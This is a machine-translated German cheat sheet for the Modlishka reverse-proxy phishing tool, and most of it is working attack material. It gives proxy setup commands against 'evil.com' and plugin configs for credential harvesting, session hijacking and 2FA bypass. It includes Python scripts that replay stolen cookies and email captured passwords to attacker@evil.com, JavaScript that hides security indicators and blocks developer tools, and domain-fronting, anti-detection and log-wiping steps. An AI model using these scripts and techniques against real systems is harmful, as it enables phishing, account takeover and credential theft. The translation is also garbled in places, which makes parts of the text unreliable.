Modlishka Reverse Proxy Phishing Tool Cheat Sheet
Überblick
Modlishka ist ein fortschrittliches Reverse Proxy Phishing-Tool, das von drk1wi entwickelt wurde, das anspruchsvolle Phishing-Angriffe mit 2FA Bypass-Funktionen und Session-Hijacking ermöglicht. Es handelt sich um eine transparente Proxy zwischen dem Opfer und der legitimen Website, die Erfassung von Anmeldeinformationen und Sitzungstoken in Echtzeit.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Genehmigung vor der Verwendung in jeder Umgebung haben.
Installation
Vorkompilierte Binäre
```bash
Download latest release for Linux
wget https://github.com/drk1wi/Modlishka/releases/latest/download/Modlishka-linux-amd64 chmod +x Modlishka-linux-amd64
Download for Windows
Download Modlishka-windows-amd64.exe from GitHub releases
Download for macOS
wget https://github.com/drk1wi/Modlishka/releases/latest/download/Modlishka-darwin-amd64 chmod +x Modlishka-darwin-amd64 ```_
Aufbau von Source
```bash
Install Go (version 1.19+)
git clone https://github.com/drk1wi/Modlishka.git cd Modlishka make
Cross-compile for different platforms
make build-all ```_
Docker Installation
```bash
Build Docker image
git clone https://github.com/drk1wi/Modlishka.git cd Modlishka docker build -t modlishka .
Run Modlishka in Docker
docker run -it -p 443:443 -p 80:80 modlishka ```_
Basisnutzung
Kommandozeilenoptionen
```bash
Basic usage
./Modlishka -target https://example.com -domain evil.com
With SSL certificate
./Modlishka -target https://example.com -domain evil.com -cert /path/to/cert.crt -certKey /path/to/key.key
With configuration file
./Modlishka -config config.json
Debug mode
./Modlishka -target https://example.com -domain evil.com -debug ```_
Datei konfigurieren
json
\\\\{
"proxyDomain": "evil.com",
"listeningAddress": "0.0.0.0",
"target": "https://example.com",
"targetRes": "",
"targetRules": "PC9oZWFkPg==",
"terminateTriggers": "",
"terminateUrl": "",
"trackingCookie": "id",
"trackingParam": "id",
"jsRules": "",
"forceHTTPS": false,
"forceHTTP": false,
"dynamicMode": false,
"debug": false,
"logPostOnly": false,
"disableSecurity": false,
"log": "requests.log",
"plugins": "all",
"cert": "",
"certKey": "",
"certPool": ""
\\\\}_
Befehlsnummer
Grundparameter
| | Parameter | Description | |
| --- | --- |
| | -target | Target website URL | |
| | -domain | Phishing domain | |
| | -listeningAddress | Listening IP address | |
| | -cert | SSL certificate file | |
| | -certKey | SSL private key file | |
| | -config | Configuration file path | |
Erweiterte Parameter
| | Parameter | Description | |
| --- | --- |
| | -debug | Enable debug mode | |
| | -log | Log file path | |
| | -plugins | Plugin configuration | |
| | -forceHTTPS | Force HTTPS redirects | |
| | -dynamicMode | Enable dynamic mode | |
| | -disableSecurity | Disable security headers | |
Erweiterte Konfiguration
SSL/TLS Setup
```bash
Generate self-signed certificate
openssl req -newkey rsa:4096 -nodes -keyout modlishka.key -x509 -days 365 -out modlishka.crt
Use Let's Encrypt certificate
certbot certonly --standalone -d evil.com ./Modlishka -target https://example.com -domain evil.com -cert /etc/letsencrypt/live/evil.com/fullchain.pem -certKey /etc/letsencrypt/live/evil.com/privkey.pem ```_
Konfiguration der Zielregeln
json
\\\\{
"targetRules": "base64_encoded_rules",
"jsRules": "base64_encoded_js_rules"
\\\\}_
Inhaltsänderung Regeln
```javascript // JavaScript rules for content modification // Base64 encode these rules for targetRules parameter
// Hide security warnings document.querySelectorAll('.security-warning').forEach(el => el.style.display = 'none');
// Modify page title document.title = 'Legitimate Service Login';
// Remove security indicators document.querySelectorAll('.ssl-indicator').forEach(el => el.remove());
// Inject custom CSS var style = document.createElement('style'); style.textContent = '.phishing-indicator \\{ display: none !important; \\}'; document.head.appendChild(style); ```_
Plugin Konfiguration
json
\\\\{
"plugins": \\\\{
"credHarvester": \\\\{
"enabled": true,
"params": \\\\{
"log": "credentials.log",
"format": "json"
\\\\}
\\\\},
"sessionHijacker": \\\\{
"enabled": true,
"params": \\\\{
"cookieLog": "cookies.log"
\\\\}
\\\\},
"2faBypass": \\\\{
"enabled": true,
"params": \\\\{
"tokenLog": "tokens.log"
\\\\}
\\\\}
\\\\}
\\\\}_
2FA Bypass Techniken
Sitzung Token Capture
```bash
Modlishka automatically captures session tokens
Monitor the log file for captured sessions
| tail -f requests.log | grep -i "session\ | token\ | cookie" |
Extract session cookies
grep -o '"cookies":[.*]' requests.log|jq '.cookies' ```_
Echtzeit Session Hijacking
```python
Python script to monitor and use captured sessions
import json import requests import time
def monitor_sessions(log_file): with open(log_file, 'r') as f: f.seek(0, 2) # Go to end of file
while True:
line = f.readline()
if line:
try:
data = json.loads(line)
if 'cookies' in data:
cookies = data['cookies']
# Use captured cookies for session hijacking
hijack_session(cookies)
except:
pass
time.sleep(1)
def hijack_session(cookies): session = requests.Session() for cookie in cookies: session.cookies.set(cookie['name'], cookie['value'])
# Access protected resources
response = session.get('https://example.com/dashboard')
print(f"Session hijack successful: \\\\{response.status_code\\\\}")
```_
TOTP/SMS Bypass
```bash
Modlishka captures 2FA tokens in real-time
The victim enters the 2FA code on the phishing site
Modlishka forwards it to the legitimate site
Session is established and captured
Monitor 2FA bypass attempts
| grep -i "2fa\ | totp\ | sms\ | verification" requests.log | ```_
Evasion Techniken
Domain Fronting
```bash
Use CDN for domain fronting
./Modlishka -target https://example.com -domain cdn.cloudflare.com -hostHeader evil.com
Configure DNS for domain fronting
Point evil.com to CDN IP
Configure CDN to forward to Modlishka server
```_
Verkehrsobfukation
json
\\\\{
"userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"customHeaders": \\\\{
"X-Forwarded-For": "192.168.1.100",
"X-Real-IP": "192.168.1.100",
"Accept-Language": "en-US,en;q=0.9"
\\\\}
\\\\}_
Anti-Detektionsmaßnahmen
```javascript // Inject anti-detection JavaScript // Disable developer tools document.addEventListener('keydown', function(e) \\{ | if (e.key === 'F12' | | (e.ctrlKey && e.shiftKey && e.key === 'I')) \\{ | e.preventDefault(); return false; \\} \\});
// Disable right-click document.addEventListener('contextmenu', function(e) \\{ e.preventDefault(); return false; \\});
// Clear console setInterval(function() \\{ console.clear(); \\}, 1000); ```_
Geolocation Filtering
```python
Python script for geolocation-based filtering
import geoip2.database from flask import Flask, request, abort
app = Flask(name) reader = geoip2.database.Reader('/path/to/GeoLite2-City.mmdb')
ALLOWED_COUNTRIES = ['US', 'CA', 'GB']
@app.before_request def check_geolocation(): client_ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
try:
response = reader.city(client_ip)
country_code = response.country.iso_code
if country_code not in ALLOWED_COUNTRIES:
abort(404)
except:
# If geolocation fails, allow access
pass
```_
Credential Harvesting
Analyse der Ergebnisse
```bash
Extract credentials from logs
| grep -o '"username":"[^"]"' requests.log | cut -d'"' -f4 | sort -u | grep -o '"password":"[^"]"' requests.log|cut -d'"' -f4
Extract email addresses
grep -oE '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+.[a-zA-Z]\\{2,\\}' requests.log|sort -u
Extract session tokens
grep -o '"sessionToken":"[^"]*"' requests.log|cut -d'"' -f4 ```_
Echtzeitüberwachung
```python
Real-time credential monitoring
import json import time import smtplib from email.mime.text import MIMEText
def monitor_credentials(log_file): with open(log_file, 'r') as f: f.seek(0, 2)
while True:
line = f.readline()
if line:
try:
data = json.loads(line)
if 'username' in data and 'password' in data:
send_notification(data['username'], data['password'])
except:
pass
time.sleep(1)
def send_notification(username, password): msg = MIMEText(f"New credentials captured:\nUsername: \\{username\\}\nPassword: \\{password\\}") msg['Subject'] = 'Modlishka - Credentials Captured' msg['From'] = 'modlishka@evil.com' msg['To'] = 'attacker@evil.com'
server = smtplib.SMTP('localhost')
server.send_message(msg)
server.quit()
```_
Datenbankspeicher
```python
Store credentials in database
import sqlite3 import json
def store_credentials(log_file, db_file): conn = sqlite3.connect(db_file) cursor = conn.cursor()
# Create table
cursor.execute('''
CREATE TABLE IF NOT EXISTS credentials (
id INTEGER PRIMARY KEY,
timestamp TEXT,
username TEXT,
password TEXT,
ip_address TEXT,
user_agent TEXT
)
''')
with open(log_file, 'r') as f:
for line in f:
try:
data = json.loads(line)
if 'username' in data and 'password' in data:
cursor.execute('''
INSERT INTO credentials
(timestamp, username, password, ip_address, user_agent)
VALUES (?, ?, ?, ?, ?)
''', (
data.get('timestamp'),
data.get('username'),
data.get('password'),
data.get('ip'),
data.get('userAgent')
))
except:
pass
conn.commit()
conn.close()
```_
Operationelle Sicherheit
Infrastrukturaufbau
```bash
Use VPS with clean IP reputation
Implement proper DNS configuration
Use legitimate SSL certificates
Set up redirectors and load balancers
```_
Verwaltung
```bash
Rotate logs to prevent disk space issues
logrotate -f /etc/logrotate.d/modlishka
Secure log storage
chmod 600 requests.log chown root:root requests.log
Remote log shipping
rsync -avz requests.log user@backup-server:/logs/ ```_
Reinigungsverfahren
```bash
Secure deletion of logs
shred -vfz -n 3 requests.log shred -vfz -n 3 credentials.log
Clear system logs
journalctl --vacuum-time=1d
Clear bash history
history -c rm ~/.bash_history ```_
Fehlerbehebung
Verbindungsprobleme
```bash
Test target connectivity
curl -I https://example.com
Check DNS resolution
dig evil.com nslookup evil.com
Test SSL certificate
openssl s_client -connect evil.com:443 -servername evil.com ```_
SSL/TLS Ausgaben
```bash
Verify certificate
openssl x509 -in modlishka.crt -text -noout
Check certificate chain
openssl verify -CAfile ca.crt modlishka.crt
Test SSL configuration
sslscan evil.com:443 ```_
Leistungsfragen
```bash
Monitor resource usage
top -p $(pgrep Modlishka)
Check network connections
netstat -tulpn|grep Modlishka
Monitor disk usage
df -h du -sh requests.log ```_
Debug Mode
```bash
Enable debug logging
./Modlishka -target https://example.com -domain evil.com -debug
Analyze debug output
tail -f debug.log|grep -i error
Check for common issues
| grep -i "certificate\ | ssl\ | tls\ | dns" debug.log | ```_
Detektive Evasion
Netzwerkebene
- Verwenden Sie legitime Domains und Zertifikate
- Implementierung der richtigen DNS-Konfiguration
- Verwenden Sie CDN und Domain Fronting
- Vary Verkehrsmuster und Timing
- Implementierung der richtigen Fehlerbehandlung
Anwendungsebene
- Mimic legitimes Website-Verhalten
- Verwenden Sie richtige HTTP-Header und Antworten
- Implementierung von Anti-Bot-Maßnahmen
- Verwenden Sie legitime Benutzer
- Griff Rand Fälle anmutig
Verhalten
- Grenzangriffsdauer
- Zielspezifische Benutzer/Organisationen
- Social Engineering für Erstzugriff nutzen
- Durchführung richtiger Reinigungsverfahren
- Monitor für Erkennungsindikatoren
Ressourcen
- Modlishka GitHub Repository
- Modlishka Dokumentation
- [drk1wi Blog](_LINK_5__ -%20Reverse%20Proxy%20Phishing%20Techniques
- [2FA Bypass Research](__LINK_5___
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Modlishka. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *